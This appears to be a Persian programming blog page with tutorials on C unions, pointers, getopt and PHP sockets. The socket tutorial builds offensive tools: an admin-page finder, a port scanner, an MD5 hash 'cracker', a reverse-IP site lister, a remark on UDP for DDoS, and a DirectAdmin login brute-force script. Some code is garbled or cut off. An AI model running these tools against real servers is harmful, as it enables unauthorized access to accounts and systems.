نوشته های علیرضا

نظرتون درباره آموزش ساختن فریمورک با php چیه؟

علیرضا — Sun, 18 Aug 2019 10:13:47 +0430

درود, راستشو بخواید می خواستم آموزش ساختن یک فریمورک کوچولو با php درست کنم ولی بعدش به این نتیجه رسیدم شاید مفید نباشه و اینطوری فقط وقت تلف می شه برای همین تصمیم گرفتم اینجا بپرسم ببینم نظر شما چیه؟ به نظرتون همچین آموزشی می تونه مفید باشه؟درست کنم یا نه؟ پیشنهاد وسوسه انگیز دیگه ای دارید؟از نظر خودم که ساختن فریمورک خیلی مزیت ها داره, برای مثال, یه جورایی متوجه می شی که بقیه فریمورک ها چطور کار می کنن و این خودش علاوه بر چالش برانگیز بودنش خیلی هیجان انگیز هست(لااقل برای من که اینطور هست :D ) و اینکه تو این راه کلی تجربه کسب میشه و کلی چیزای باحال یاد می گیریم.خوش حال می شم نظر و پیشنهاد بدید.

کاربرد union ها در سی

علیرضا — Thu, 01 Feb 2018 12:53:25 +0330

درود, خیلی وقت ها شده که دوستام از من می پرسند که union برای چی هست؟ به درد چی میخوره؟ در این آموزش قصد دارم یک کوچولو از کارای جذابی که میشه با union هارو کرد بهتون بگم. در واقع بااستفاده از union ها شما می توانید با داده های موجود به طریق های مختلف برخورد کنید. برای مثال, در سی تابعی وجود نداره که داده short را در فایل ذخیره کنه اما اگر بخواهید این کارو انجام بدید چه باید کنید؟ این جاهست که از سازندگان سی به خاطر ساخت union ها تشکر می کنید. خب برای کار بالا می تونید به صورت زیر عمل کنید:union w_char{ short int number; char ch[2]; };حال به لطف کد بالا می تونید داده short رو در فایل ذخیره کنید. (داده گرفته شده را در number ذخیره کنید و هنگام نوشتن و خواندن در فایل با chars کار کنید.)اما من می خوام یه کاردیگه ای رو هم با union و struct انجام بدم و اونم بدست آوردن بیت های یک داده ۱ بایتی است.(البته شما با عملگرهای بیتی خیلی سریع می توانید این کارو انجام بدید ولی اینجا برای اینکه نشون بدیم چقدر union ها و struct ها خوب و باحال هستند با اونا این کارو انجام می دیم)چون هر بایت شامل ۸ بیت هست پس یک struct به صورت زیر تعریف می کنیمstruct byte_bits{ _Bool zero:1, one :1, two:1, three:1, four:1, five:1, six:1, seven:1; };در واقع با استفاده از این struct به بیت های یک بایت داده دسترسی پیدا می کنیمحالا با استفاده از union ها این کار رو عملی می کنیم, به این صورتunion char_bits{ struct byte_bits bits; char data; };خب همانطوری که می دونید در union ها بزرگترین داده به عنوان طول union درنظر گرفته میشه و همه داده های فیلد های union در اون فضا ذخیره میشه و ما از این خاصیت باحال اون استفاده می کنید که بیت های داده رو بدست آوریم. پس به تابع زیر دقت کنیدchar *get_bits(char data){ struct byte_bits{ _Bool zero:1, one :1, two:1, three:1, four:1, five:1, six:1, seven:1; }; union char_bits{ struct byte_bits bits; char data; }temp; temp.data = data; char *bits = (char *)malloc(sizeof(char) * 9); *(bits+8) = NULL; *(bits+7) = temp.bits.zero + '0'; *(bits+6) = temp.bits.one + '0'; *(bits+5) = temp.bits.two + '0'; *(bits+4) = temp.bits.three + '0'; *(bits+3) = temp.bits.four + '0'; *(bits+2) = temp.bits.five + '0'; *(bits+1) = temp.bits.six + '0'; *bits = temp.bits.seven + '0'; return bits; }همان طور که دیدید ما داده ای رو که کاربر وارد می کنه با data در union ذخیره می کنیم اما چون به بیت های اون نیاز داریم خودمون با bits کار می کنیم. به این ترتیب ما تونستیم با یک نوع داده به انواع مختلف برخورد کنیم.چند نکته:۱- در کد بالا چون من می خواستم در آخر به شکلی مثل زیرprintf("%s\n", bits);چاپ کنم بیت هارو با '0' جمع کردم که به کد اسکی تبدیل بشه اون عدد مورد نظر.۲- شما می تونید اون کار جمع کردن رو هم به روش های مختلف (برای مثال با if) هم انجام بدید. ۳- شما می توانید برای داده های بیشتر(۲ بایتی,۴بایتی و…) هم این روش رو پیاده سازی کنید.در واقع من فقط می خواستم بهتون نشون بدم که این کار چگونه انجام میشه و شما با خلاقیت خودتون می تونید باهاش کارهای باحال ترو بهتری رو انجام بدید.امیدوارم که این آموزش مفید بوده باشه و دیگه نگید union ها به درد چی می خورند. و در نظر داشته باشید که این یکی از قابلیت های مفید union ها بود و با استفاده از اون شما می توانید کاراهای جذاب تر دیگه هم انجام بدید.و در اخر کد کامل برنامه که تست کنید رو هم براتون گذاشتم#include #include char *get_bits(char data){ struct byte_bits{ _Bool zero:1, one :1, two:1, three:1, four:1, five:1, six:1, seven:1; }; union char_bits{ struct byte_bits bits; char data; }temp; temp.data = data; char *bits = (char *)malloc(sizeof(char) * 9); *(bits+8) = NULL; *(bits+7) = temp.bits.zero + '0'; *(bits+6) = temp.bits.one + '0'; *(bits+5) = temp.bits.two + '0'; *(bits+4) = temp.bits.three + '0'; *(bits+3) = temp.bits.four + '0'; *(bits+2) = temp.bits.five + '0'; *(bits+1) = temp.bits.six + '0'; *bits = temp.bits.seven + '0'; return bits } int main(int argc, char *argv[]) { char a = 129; char *bits = get_bits(a); printf("%s\n", bits); free(bits); return 0; }

اشاره گرها در سی

علیرضا — Wed, 31 Jan 2018 12:44:18 +0330

چرا از اشاره گر استفاده کنیم؟ اول, با استفاده از اشاره گرها می توانید در درون توابع خود مقدار آرگومان های ورودی به تابع رو عوض کنید. دوم, اشاره گر ها از تخصیص حافظه پویا پشتیبانی می کنند. سوم, با استفاده از اشاره گرها می توانید نحوه ی کار یک زیربرنامه رو بهبود ببخشید و در آخر با استفاده از اشاره گرها می توانید ساختمان داده های پویا از قبیل, درخت های دودویی, لیست های پیوندی و… درست کنید.همانطور که در کتاب مرجع سی گفته شده اشاره گرها ابزار بسیار قدرتمندی در زبان سی هستند ولی یکی از پرخطرترین ویژگی های آن هم هستند. برای مثال درصورت استفاده نادرست از اشاره گرها برنامه شما ممکن هست crash کند.در زبان سی هر متغیری که تعریف می‌شود یک محتوا و یک آدرس دارد و شما می‌توانید به محتوای آن با نوشتن نام آن و با نوشتن & قبل از نام آن به آدرس آن متغیر دسترسی پیدا کنید. (البته توابع هم دارای آدرس هستند ولی موضوع بحث فعلی ما نیست)اشاره گر ها متغیر هایی هستند که در آن‌ها آدرس قرار می‌گیرد(در واقع آدرس متغیر های دیگه یا به گفته کتاب مرجع سی, شی های دیگر) و باید در تعریف آن‌ها به طور صریح بگویید که این متغیر از نوع اشاره گر می‌باشد و همچنین بگویید که آدرس چه نوع داده‌ای در آن قرار می‌گیرد.(برای این باید به طورصریح بگویید که این متغیر به چه نوع متغیری اشاره می کند که در هنگام استفاده از اپراتور های ریاضی کامپایلر تشخیص دهد که برای مثال متغیری که بهش اشاره کردیم چقدر فضا گرفته است و چقدر باید بخونه)برای تعریف اشاره گرها به صورت زیر عمل می کنیمtype *name;که در آن type نوع های اولیه زبان سی و یا هر نوع داده ای معتبر در سی (مثل, int, float, structو…) می تواند باشد. در واقع در سی هرنوع داده ای اشاره گری می تواند به هرجایی از حافظه که بخواهد اشاره کند اما اعمال انجام شده بر روی آن ها باتوجه به نوع پایه (همون type) انجام می گیرید. برای مثال اگر یک متغیر را اشاره گری به نوع int تعریف کنید, یعنیint *pint;صرف نظر از آنکه pint به کجا اشاره می کند, کامپایلر فرض می کند که آن به یک عدد صحیح(که بیشتر سیستم های امروز ۴ بایت در نظر می گیرند) اشاره می کند.(یعنی کامپایلر هیچ اهمیتی نمیده که در اونجای حافظه شما واقعی عدد صحیح گذاشتید یا نه)اپراتور های اشاره گری دوتا هستند. * و & (که در باره & قبل گفته شده است). اپراتور * مکمل اپراتور & است و در واقع مقدار متغیری که ما بهش اشاره می کنیم رو برمی گردونه. برای مثال فرض کنید کد زیر را نوشته ایمint a = 1,b; int *pa; pa = &a; b = *pa;حال فرض کنید متغیر a در آدرس خانه 1000 و متغیر b در ادرس 1004 ذخیره شده باشند.با اجرای خط pa = &a; مقدار متغیر pa می شود آدرس a که همان1000 است.(یعنی الان اگر pa را با printf چاپ کنید عدد 1000 رو صفحه نمایش چاپ میشه)حال *pa یعنی مقدار جایی که pa دارد به آن اشاره می کند. چون pa به a اشاره می کنه وقتی *pa بنویسید نتیجه میشه مقداری که در a است که در اینجا میشه 1.تفاوت تعریف متغیر از نوع اشاره گر و متغیر های عادی در این است که متغیر های اشاره گری در خود آدرس داده‌ای از همان نوع که تعریف شده‌اند را در خود قرار می‌دهند اما متغیر های عادی داده‌ای از همان نوع را در خود قرار می‌دهند. در مثال بالا متغیر pInt آدرس مکانی که یک عدد صحیح در آنجا است را در خود قرار می‌دهد نه یک عدد صحیح عادی را.(درواقع خود آدرس ها هم عددی صحیح هستند)شما می توانید اشاره گرها را به یکدیگر انتساب کنید, از یکدیگر کم کنید, به آن ها عددی اضافه و یا کم کنید اما اشاره گرها را نمی توانید بایکدیگر جمع کنید پس عملیات زیر یک خطای کامپایل استint *a, *b, *c; c = a+b;اما اعمال زیر صحیح می باشدc = b – 1; c = --b; c = b – a;حال به عکس های زیر توجه کنیدوقتی یک متغیر تعریف می‌کنید و آن را مقدار دهی نمی‌کنید معلوم نیست چه مقداری در آن قرار می‌گیردو وقتی یک متغیر از نوع اشاره گر تعریف می‌کنید در آن NULL قرار می‌گیرد و این یعنی که آن متغیربه هیچ جا اشاره نمی‌کند. وقتی می نویسید type var; به اندازه sizeof(type) کامپایلر فضا می‌گیرد اما وقتی می نویسید type *var; کامپایلر به اندازه سیستم آدرس دهی کامپیوترتان (به طور معمول ۴ بایت و یا ۸ بایت) فضا می‌گیرید چون در این نوع متغیر قرار است آدرس یک خانه‌ای از حافظه قرار گیرید.حال به عملگر های ++ و –- و sizeof دقت کنید.فرض کنید متغیر و اشاره گری به آن به صورت روبرو تعریف شده باشد type var; type *pVar = &var;حال اگر بنویسید pVar += number و فرض کنید مقدار X در pVar باشد آنگاه مقدار جدید pVar می‌شود X + sizeof(type) * number یعنی pVar به number خانه بعد از خود اشاره می‌کند.حال اگر بنویسید(*pVar) + numberآنگاه مقدار آنجایی که pVar به آن اشاره می‌کند (در این مثال مقدار var) number واحد افزایش می‌یابد.به شکل زیر دقت کنید

آموزش عبارت های منظم در PHP

علیرضا — Sun, 28 Jan 2018 11:57:27 +0330

تفسیر آرگومان های خط فرمان با سی

علیرضا — Fri, 26 Jan 2018 14:06:19 +0330

درود, خیلی وقت‌ها شده دیدید بعضی از برنامه‌ها یک سری آپشن ها دارند و آن ها را در خط فرمان به عنوان ورودی می گیرند؟ برای مثال شاید دیدید که دستور ps بدون آرگومان و گاهی وقت ها با آرگومان میشه اجراش کرد برای مثال ps -A یا ps aux و...حالا اگر بخواید خودتون این آپشن هارو آنالیز کنید به احتمال وقت گیر هست و ممکن هست به اون خوبی که می خواید نشه ما برای این که این کار را راحت تر انجام بدیم از کتابخونهC GNU کمک می گیریم و من در این جا قصد دارم اونو آموزش بدم.برای شروع اول هدر getopt.h رو به برنامه اینکلود کنید.#include این هدر یک سری متغییر های سراسری داره که در زیر توضیح میدم(بعد در مورد همشون تک تک توضیح میدم)char *optarg وقتی آرگومانی ست بشه این متغییر مقدار دهی میشه int optind اولین آپشنی که در برنامه نباشه انیدکسش توی این ذخیره میشه int opterr وقتی عددی غیر از ۰ باشه (به صورت پیش‌فرض هست) وقتی یک متغییر نامتعبر(آپشن تعریف نشده در برنامه)ظاهر بشه اررو روی صفحه چاپ میشه int optopt وقتی یک متغییر نامتعبر(آپشن تعریف نشده در برنامه)ظاهر بشه یک مقدار ؟ یا : برگردانده میشه که این متغییر شامل مقدار نامعتبر هست.خب اگر تابع getopt() ? برگرداند یعنی این آپشن معتبر نیست(تعریف نشده) و اگر : برگرداند یعنی این اپشن یک ارگومان می‌خواهد که وارد نشده.به کد زیر توجه کنید#include #include #include // exit() int main(int argc,char *argv[]) { const char * const shortOptions = "ho:c"; int nextOption; while( (nextOption = getopt(argc,argv,shortOptions)) != -1) { switch(nextOption) { case 'h': printf("i got h \n"); break; case 'o': printf("i got o with arg %s \n",optarg); break; case 'c': printf("i got c with arf %s \n",optarg); break; case '?': printf("invalid arg %c \n",optopt); break; default : break; } } return 0; }اگر کد بالارو کامپایل کنید و پارامتر -h -o hello رو بهش بدید خروجی شبیه خروجی زیر خواهید داشتi got h i got o with arg hello حال اگر پارامتر -h -o hello -g رو رد کنید خروجی شبیه خروجی زیر خواهید داشتi got h i got o with arg hello ./a.out: invalid option -- 'g' invalid arg g اگر دقت کرده باشد ./a.out: invalid option – 'g' رو شما ننوشتید و خود تابع اینو چاپ کردهاگر می خواید که اررو هارو خودتون نمایش بدید و مدیریت کنید باید مقدار opterr رو قبل از فراخانی ۰ قرار بدید در این صورت دیگه اررو خود برنامه چاپ نمیکنه و مسوول مدیریتش شما هستید.به کد زیر توجه کنید#include #include #include // exit() int main(int argc,char *argv[]) { const char * const shortOptions = ":ho:c"; int nextOption; opterr = 0; while( (nextOption = getopt(argc,argv,shortOptions)) != -1) { switch(nextOption) { case 'h': printf("i got h \n"); break; case 'o': printf("i got o with arg %s \n",optarg); break; case 'c': printf("i got c with arg %s \n",optarg); break; case ':': printf("arg %c need arg \n",optopt); break; case '?': printf("invalid arg %c \n",optopt); break; default : break; } } return 0; }خب برای اینکه getopt() برای آپشنی که نیاز به آرگومان دارد : رو برگرونه باید به اول آپشن : اضافه کنید. ماconst char * const shortOptions = "ho:c";رو بهconst char * const shortOptions = ":ho:c";تغییر دادیم. حالا اگر یک آپشن به آرگومان نیاز داشته باشد و وارد نشده باشد تابع : بر می گرداند و می‌توانید آن را مدیریت کنید.همچنین ما مقدار opterr صفر قرار دادیم که برنامه خودش اروری رو چاپ نکنه و مدیریتش به دست خودمون باشه.حال اگر پارامتر ورودی شبیه به بود -o hello "im am here" "hahah" چی؟ به کد زیر توجه کنید#include #include #include // exit() int main(int argc,char *argv[]) { const char * const shortOptions = ":ho:c"; int nextOption; opterr = 0; while( (nextOption = getopt(argc,argv,shortOptions)) != -1) { switch(nextOption) { case 'h': printf("i got h \n"); break; case 'o': printf("i got o with arg %s \n",optarg); break; case 'c': printf("i got c with arg %s \n",optarg); break; case ':': printf("arg %c need arg \n",optopt); break; case '?': printf("invalid arg %c \n",optopt); break; default : break; } } while(optind < argc) { printf("%s\n",argv[optind++]); } return 0; }درواقع دو پارامتر آخر اضافی هستند و جز آپشن محسوب نمی‌شوند همانطور که گفتیم optind ایندکس اولین عضو غیر آپشن رو بر میگردونه که ما با while(optind < argc) { printf("%s\n",argv[optind++]); }اونارو چاپ کردیم.

آموزش سوکت نویسی در PHP

علیرضا — Fri, 26 Jan 2018 13:29:07 +0330

درود به دوستان عزیز امیدوارم حالتون خوب باشه .در این جا قصد دارم که آموزش برنامه نویسی شبکه در php رو بهتون یاد بدم و در آخر هم چند برنامه(پیشمایش پورت, پیدا کردن صفحه ادمین,پیدا کردن سایت های روی یک سرور) رو آموزش می دم.در اینجا آموزش کار با توابع سوکت در php و ارسال و دریافت اطلاعات و .... رو یاد میگیرید .سوکت هم مانند cURL میتونید در فایل php.ini فعال کنید که بتونید ازش استفادع کنید .این اکستنشن هم باز در ویندوز با نام php_sockets.dll و در لینوکس با نام sockets.so قابل مشاهده هست .برای فعال کردن کافیه به php.ini رفته و extension=php_sockets.dll رو پیدا کرده و ; قبل از اونو بردارید سپس وب سرور خود رو ری استارت کنید . حالا میتونید ازش استفاده کنید . با سپاسخب دوستان عزیز بریم سراغ آموزشبرای برنامه نویسی شبکه یا سوکت php توابعی متخلف و زیادی رو داره که در اینجا به آموزش و بررسی اونا می پردازیم.برای ارتباط با یک سرویس دهنده باید یک سوکتی ایجاد بشه که php توابع مختلفی رو روی ورژن های مختلف ارایه میدهتابع fsockopen(target,port,error,errstr,timeout) برای ایجاد سوکت به یک مقصد خاص استفاده میشود.این تابع 2 آرگومان ضروری و 3 تا غیر ضروری میگیرهآرگومان اول مقصد مورد نظر هست برای مثال www.google.comOR192.168.1.1 اگر php شما opnessl رو هم ساپورت کنه میتونید به ssl هم وصل بشید .آرگومان دوم شماره پورت هست برای مثال 80 25 و ...آرگومان سوم و چهارم به روش ارجاعی به تابع وصل میشن. آرگومان آخر هم زمانی هست که میخوای روی سوکت کار بشه.تابع fscokopen() یک اشاره گر فایل بر میگردونه که میشه با توابع فایل ها مثل fputs , fgets و ... باهاش کار کرد.اگر تابع نتونه اتصالی بگیره false رو بر میگردونه که اگر هم آرگومان سوم و چهارم پر شده باشد میتونید اررور هارو بگیرید . خب بریم سراغ مثال . به کد زیر توجه کنید :$socket = fsockopen("www.bing.com",80,$errno,$errstr);if(!$socket){ echo $errstr; exit;}$header = "GET / HTTP/1.1\r\n";$header .= "Host: www.bing.com\r\n";$header .= "User-Agent: ".$_SERVER["HTTP_USER_AGENT"]."\r\n";$header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";$header .= "Connection: keep-alive\r\n\r\n";fwrite($socket,$header);while(!feof($socket)) echo fgets($socket);خب اگر کد بالارو اجرا کنید خروجی شما صفحه اول سایت bing.com خواهد بود.حالا اگر دقت کرده باشید با توجه به هدری که نوشتیم ما درخواست نمایش صفحه اول رو کرده بودیم که جواب هم مطابق میلمان بود.حال اگر صفحه خاصی رو میخواستیم ببینیم چطور ؟ برای مثال میخوایم صفحه http://www.bing.com/profile/history?FORM=Z9LH5 رو ببنیم خب کافیه این درخواستمون رو توی هدر به سوکت php بگیم.به قطعه کد زیر توجه کنید :$socket = fsockopen("www.bing.com",80,$errno,$errstr);if(!$socket){ echo $errstr; exit;}$header = "GET /profile/history?FORM=Z9LH5 HTTP/1.1\r\n";$header .= "Host: www.bing.com\r\n";$header .= "User-Agent: ".$_SERVER["HTTP_USER_AGENT"]."\r\n";$header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";$header .= "Connection: keep-alive\r\n\r\n";fwrite($socket,$header);while(!feof($socket)) echo fgets($socket); این خط $header = "GET /profile/history?FORM=Z9LH5 HTTP/1.1\r\n"; رو تغییر دادیم.حالا فرض کنید ما فقط می خواستیم ببینیم اون صفحه وجود داره یا نه (کاری که اکثر ادیمن فایندر ها انجام می دهند)خب جواب از وب سرور توی خط اول مشخص میشه و تابع fgets هم که یک خط رو میخونه پس while(!feof($socket)) echo fgets($socket);رو به $result = fgets($socket);تغییر میدیم . حالا مقدار بازگشتی توی $result هست حالا باید مقدار رو چک کنیم. از preg_match() کمک می گیریم (آموزشش رو گذاشتم پیدا کنید) پس کد بالا رو به کد زیر تغییر میدیم$socket = fsockopen("www.bing.com",80,$errno,$errstr);if(!$socket){ echo $errstr; exit;}$header = "GET /profile/history?FORM=Z9LH5 HTTP/1.1\r\n";$header .= "Host: www.bing.com\r\n";$header .= "User-Agent: ".$_SERVER["HTTP_USER_AGENT"]."\r\n";$header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";$header .= "Connection: keep-alive\r\n\r\n";fwrite($socket,$header);$result = fgets($socket);if(preg_match("/200 OK /",$result))echo "found";elseecho "not found";اگر کد بالارو اجرا کنید خروجی شما found خواهد بود. (حالا برای خودتون با یک صفحه نامعتبر امتحان کنید)خب نظرتون چیه یکم کد رو پیشرفته ترش کنیم ؟ اگر وضعیت 302 بود چی ؟ ممکن هست بخوایم با توجه به مقادیر بازگشتی خاص عمل خاصی رو انجام بدیم مثلا می خوایم اگر 302 مقدار بازگشتی بود صفحه رو دنبال کنیم . خب اول بیایم کد رو بهتر کنیم برای این کار یک تابع تعریف می کنم که این کارو انجام بده .به قطعه کد زیر توجه کنید :echo load_url("www.bing.com","/profile/history?FORM=Z9LH5");function load_url($url,$page){ $socket = fsockopen($url,80,$errno,$errstr); if(!$socket) { echo $errstr; exit; } $header = "GET $page HTTP/1.1\r\n"; $header .= "Host: $url\r\n"; $header .= "User-Agent: ".$_SERVER["HTTP_USER_AGENT"]."\r\n"; $header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; $header .= "Connection: keep-alive\r\n\r\n"; fwrite($socket,$header); $result = fgets($socket); if(preg_match("/\s(\d+)\s/",$result,$number)) return $number[0]; else return null; } کد قبل رو به کد بالا تبدیل کردم حالا یک تابع دارم یک سایت و صفحه رو میگیره و عدد بازگشتی هدر رو برام برمیگردونه.حالا می تونیم یک ادمین فایندر بنویسم.کافیه لیست سایت هارو بگیریم و صفحه هایی که قرار چک بشه و بدیم به تایع و مقدار بازگشتی رو چک کنیم.(دقت کنید اگر توی آدرس سایت http:// بود باید حذفش کنید)البته کد بالا خیلی مشکلات داره که با خلاقیت خودتون می تونید بهترش کنید و توسعه بدید. برای مثال یکی از مشکلات پیغام 302 هست که یعنی به یک صفحه دیگه ریدایرکت میشه نظرتون چیه این 302 هارو دنبال کنیم ؟به کد زیر توجه کنید:$body = load_url("google.com","/");if($body){ echo $body;}else{ echo "null";}function load_url($url,$page){ $socket = fsockopen($url,80,$errno,$errstr); if(!$socket) { echo $errstr; exit; } $header = "GET $page HTTP/1.1\r\n"; $header .= "Host: $url\r\n"; $header .= "User-Agent: ".$_SERVER["HTTP_USER_AGENT"]."\r\n"; $header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; $header .= "Connection: keep-alive\r\n\r\n"; fwrite($socket,$header); $result = fgets($socket); $returnBody = ""; if(preg_match("/\s(\d+)\s/",$result,$status)) { switch($status[1]) { case "200": while(!feof($socket)) { $returnBody .= fgets($socket); } return $returnBody; case "301": case "302": do { $url = fgets($socket); }while(!preg_match("/Location: (http:\/\/)?(.*)/",$url,$redirect)); $splitUrl = explode("/",$redirect[2]); $url = $splitUrl[0]; $page = "/".$splitUrl[1]; return load_url($url,$page); default: return $status[1]; } }من اینو بازگشتی و به این ترتیب نوشتم شما می تونید به طریقه دیگه ای بنویسید.(توی این روش که من نوشتم کد راحت شد ولی چون بازگشتی هست خودتون بهتر می دونید اگر تعداد ریدایرکت ها زیاد بشن برنامه چطور میشه ;) )اگر دقت کرده باشید می تونید با fsockopen() برای خودتون پورت اسکنرطراحی کنید.به قطعه کد زیر توجه کنید : $openPorts = array(); $closePorts = array(); $ip = "192.168.1.1"; for($i = 20 ; $i < 100 ; $i++) { $socket = @fsockopen($ip,$i); if($socket) { $openPorts[] = $i; }else { $closePorts[] = $i; } fclose($socket); } echo "open ports :
"; print_r($openPorts); echo "
close ports :
"; print_r($closePorts);با کمی خلاقیت می تونید کد های جالب تر و کاربردی تری بنویسید (اینجا قصد من نوشتن پورت اسکنر نبود چون برای پورت اسکنر تارگت می تونه روی نحوه ی کد نوشتن و حتا پروتکل و … تاثیر بزاره اینجا فقط خواستم بگم که میشه کارای جالبی کرد که دیگه بستگی به خودتون داره) خب نظرتون چیه یک md5 کرکر با یک سایت بنویسیم ؟من از hashtoolkit.com و md5decryption.com کمک گرفتم شما میتونید از سایت های دیگه کمک بگیرید . (مثالی بود هم برای get و هم برای post)توی cURL هم یک نمونه می نویسیم.if(isset($_POST['submit']) && isset($_POST['hash'])){ $hash = $_POST['hash']; if(!empty($hash) && strlen($hash) == 32) { md5decryption_com($hash); hashtoolkit_com($hash); }else { echo "
hash is not valid
"; } }else{ echo " ";} function hashtoolkit_com($hash){ $body = get_data("hashtoolkit.com","/reverse-hash/?hash=$hash"); if(preg_match("#\s*(.*)#",$body,$find)) echo $find[1]."
"; else echo "regex not found"; }function get_data($domain,$path){ $header = "GET $path HTTP/1.1\r\n". "Host: $domain\r\n". "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0\r\n". "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n". "Referer: http://$domain$path\r\n". "Connection: keep-alive\r\n\r\n"; $socket = fsockopen($domain,80,$errno,$error); if(!$socket) return $error; $result = ""; fwrite($socket,$header); while(!feof($socket)) $result .= fgets($socket); fclose($socket); return $result; }function md5decryption_com($hash){ $body = post_data("md5decryption.com","/","hash=$hash&submit=Decrypt+It%21"); if(preg_match("/Decrypted Text: <\/b>(.*)<\/font>/",$body,$find)) echo $find[1]."
"; else echo "regex not found"; }function post_data($domain,$path,$data){ $header = "POST $path HTTP/1.1\r\n". "Host: $domain\r\n". "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0\r\n". "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n". "Referer: http://$domain$path\r\n". "Connection: keep-alive\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "Content-Length: ".strlen($data)."\r\n\r\n". "$data\r\n"; $socket = fsockopen($domain,80,$errno,$error); if(!$socket) return $error; $result = ""; fwrite($socket,$header); while(!feof($socket)) $result .= fgets($socket); fclose($socket); return $result; }خب نظرتون چیه اون برنامه که سایت های روی سرور رو در می آورد و با cURL نوشتیم با سوکت هم بنوسیم ؟به قطعه کد زیر توجه کنید :if(isset($_POST['submit']) && isset($_POST['ip'])){ $ip = $_POST['ip']; if(!empty($ip)) { find($ip); }else { echo "
ip is not valid
"; } }else{ echo " ";}function find($ip){ $myPattern = "#(.*?)/","",$find[1]); $sites[] = $urls; } if(preg_match("/class\=\"sb_pagN\"/",$result)) $cnt+=10; else $nextpage=false; }}function get_data($domain,$path){ $header = "GET $path HTTP/1.1\r\n". "Host: $domain\r\n". "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0\r\n". "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n". "Referer: http://$domain$path\r\n". "Connection: keep-alive\r\n\r\n"; $socket = fsockopen($domain,80,$errno,$error); if(!$socket) return $error; $result = ""; fwrite($socket,$header); while(!feof($socket)) $result .= fgets($socket); fclose($socket); return $result; }خب آموزش هارو یاد گرفتید فقط چندتا مثال می زنم دیگه تمومه (اگر میدونید چیز بیشتری نیاز دارید بگید بزارم)قبل از نوشتن یک برنامه بروت برای دایرکت ادیمن قبلش یه نکته ای رو بگم . ما از fsockopen() برای پروتکل tcp ip استفاده کردیم می تونید با udp هم کار کنید.به صورت زیر$fp=fsockopen("udp://127.0.0.1",13,$errno,$error);(یکی از بی شمار روش برای دی داس-حملات تکذیب سرور-)خب بریم سراغ بروت فورس ؟خب اول یک دایرکت ادمین پیدا می کنیم بعد با یوزر پاس درست وارد میشیم و هدر رو چک می کنیم و یک بار هم با یوزر پاس نادرست این کارو انجام می دیم (میشه برای تشخیص بن شدن هم این کارو تکرار کنید تا ارور هنگام بن شدن هم بتونید مدیریت کنید) بعد طبق اون الگو برنامه رو پیش می بریمخب من یک دایرکت ادیمنو لوگین کردم هدر رو نگاه کردیم شبیه زیر بود"POST /CMD_LOGIN HTTP/1.1\r\n""Host: TARGET \r\n""User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0\r\n""Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n""Referer: http://TARGET/CMD_LOGIN\r\n""Connection: keep-alive\r\n""Content-Type: application/x-www-form-urlencoded\r\n";"referer=%2FCMD_LOGIN&username=user&password=pass\r\n";خب وقتی یوزر پاس درست بود خط اول هدر این بودHTTP/1.1 302 Foundاما وقتی نادرست بود به شکل زیر بودHTTP/1.1 200 OKپس من خط اول هدر رو چک می کنم اگه 302 Found که یعنی درست و اگر 200 OK یعنی غلطپس کد زیر رو نوشتمif(isset($_POST['submit']) && isset($_POST['domain'])){ $domain = $_POST['domain']; if(!empty($domain)) { $user = "test"; $pass = "test"; if(brute_force($domain,$user,$pass,2222)) echo "haha cracked $domain user : $user pass : $pass ...
"; }else { echo "
domian is not valid
"; } }else{ echo " ";}function brute_force($domain,$user,$pass,$port){ $data = "referer=%2FCMD_LOGIN&username=$user&password=$pass"; $result = get_data($domain,$data,$port); if(preg_match("/302 Found/",$result)) return true; else return false;}function get_data($domain,$data,$port){ $header = "POST /CMD_LOGIN HTTP/1.1\r\n"; $header .= "Host: ".$domain."\r\n"; $header .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0\r\n"; $header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; $header .= "Referer: http://".$domain."/CMD_LOGIN\r\n"; $header .= "Connection: keep-alive\r\n"; $header .= "Content-Type: application/x-www-form-urlencoded\r\n"; $header .= "Content-Length: ".strlen($data)."\r\n\r\n"; $header .= $data."\r\n"; $socket = fsockopen($domain,4041,$errno,$error); if(!$socket) echo $error; fwrite($socket,$header); $result = fgets($socket); fclose($socket); return $result; }این واسه یک سایت بود شما می تونید توسعه بدید . (یوزر و پاس هم من اینجا یکی گذاشتم که شما باید لیست درست کنید و برنامه رو بهبود بدید و فقط هدفم نشون دادن صورت کلی برنامه بود)دوستان بحث سوکت نویسی رو همینجا خاتمه میدم اگر می دونید آموزش خاص و یا چیزایی کم بود و شما نیاز دارید بگید که ادامه بدم و براتون تهیه کنیم.سپاس

آموزش کار با CURL در PHP

علیرضا — Fri, 26 Jan 2018 12:55:20 +0330

